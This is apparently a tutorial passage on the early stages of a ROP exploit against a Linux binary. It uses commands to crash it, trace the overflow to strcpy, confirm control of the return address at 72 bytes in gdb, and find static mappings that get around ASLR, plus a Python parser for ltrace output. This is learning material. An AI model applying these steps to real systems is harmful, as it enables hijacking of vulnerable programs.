ROP: Finding the vulnerable function
At this point you have been able to generate a crash on a Linux binary. We now need to find the vulnerable function before progressing.
# creating the crash
python3 -c 'print("A"*100)' > temp.txt
./binary temp.txt
Segmentation fault

Use ltrace to see if there is a library function that is causing the crash:

ltrace ./binary temp.txt 2>&1 | grep SIGSEGV -B1
7120-strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...) = 0x2ffff108b
--snip--

We can see that strcpy is the issue here, causing the crash.

Use objdump to see where in the code segment strcpy() is called. Look at the GOT of the program and grep for strcpy(). Then use objdump to specifically query the .plt segment to see where the address in the GOT is referenced. After obtaining the address, use objdump once more, change the segment to .text, and grep on the address shown in the PLT:
objdump -R ./binary | grep strcpy
0304b00a R_386_JUMP_SLOT strcpy

objdump -j .plt -d ./binary | grep b00a
70482b7: ff 25 0a b0 04 03 jmp *0x0304b00a

objdump -j .text -d ./binary | grep 82b7 -B2 -A2
# you will see the vuln buffer size,
# the address of strcpy@plt,
# and a ret, which is a good spot for a breakpoint to check
# whether your payload was successfully copied into memory

To validate your finding, see if your buffer analysis was correct (72 bytes):
python3 -c 'print("A"*72 + "BBBB")' > temp.txt
gdb ./binary
run temp.txt
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

0x42424242 is "BBBB", so the saved return address sits exactly 72 bytes into the buffer.

Find static addresses
We need to find static memory locations as ASLR will be enabled on modern systems.
There may be static regions that do not utilize ASLR. There could be static mappings due to third-party shared objects that get mapped into our program.
Use ltrace to find the static mappings:

ltrace ./binary temp.txt 2>&1 | egrep -i 'mmap|open'

Look for any shared object that is mmap'd into the binary. You should see an open() call followed by an mmap() with a non-NULL memory address passed as the first argument to mmap(); that is the library asking for a fixed location that ASLR cannot move.
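The two ltrace checks in these notes, finding the call that precedes SIGSEGV and spotting an open() followed by an mmap() at a requested address, can be scripted over saved ltrace output. This is an added example, not from the original notes: the embedded ltrace lines are constructed to mirror the session above, and the path /opt/vendor/libhelper.so is invented.

```python
import re

# Constructed ltrace output modelled on the session in these notes (not a real
# capture); the library path /opt/vendor/libhelper.so is made up.
LTRACE_OUTPUT = """\
open("temp.txt", 0, 0666)                    = 3
open("/opt/vendor/libhelper.so", 0, 0)       = 4
mmap(0x2ffff000, 8192, 3, 18, 4, 0)          = 0x2ffff000
mmap(0, 4096, 3, 34, -1, 0)                  = 0x6fff3000
strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...)  = 0x6fff3b10
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
"""

CALL_RE = re.compile(r'^(\w+)\((.*)\)\s*=\s*(\S+)$')  # name(args) = retval
MAP_FIXED = 0x10  # Linux mmap(2) flag: caller demands exactly this address

def parse_ltrace(text):
    """Return [(func, args, ret)]; a signal line becomes ('<SIG>', signame, None)."""
    events = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            events.append((m.group(1), m.group(2), m.group(3)))
        elif line.startswith('--- SIG'):
            events.append(('<SIG>', line.split()[1], None))
    return events

def crashing_call(events):
    """Library call made right before SIGSEGV (what 'grep SIGSEGV -B1' shows)."""
    for i, (func, args, _) in enumerate(events):
        if func == '<SIG>' and args == 'SIGSEGV' and i > 0:
            return events[i - 1][0]
    return None

def fixed_mappings(events):
    """Pair each mmap() requesting a non-NULL address with the open() that made
    its fd: [(path, requested_addr, returned_addr, map_fixed)]."""
    fds, found = {}, []
    for func, args, ret in events:
        if func == 'open':
            fds[int(ret)] = args.split(',')[0].strip().strip('"')
        elif func == 'mmap':
            f = [int(a.strip(), 0) for a in args.split(',')]
            addr, flags, fd = f[0], f[3], f[4]
            # a NULL hint lets the kernel pick a randomized address; fd -1 is anonymous
            if addr != 0 and fd in fds:
                found.append((fds[fd], addr, int(ret, 0), bool(flags & MAP_FIXED)))
    return found
```

A file-backed mapping that is requested at a non-NULL address, especially with MAP_FIXED set, is exactly the static region these notes tell you to look for, and the thing to flag when auditing a build for ASLR gaps.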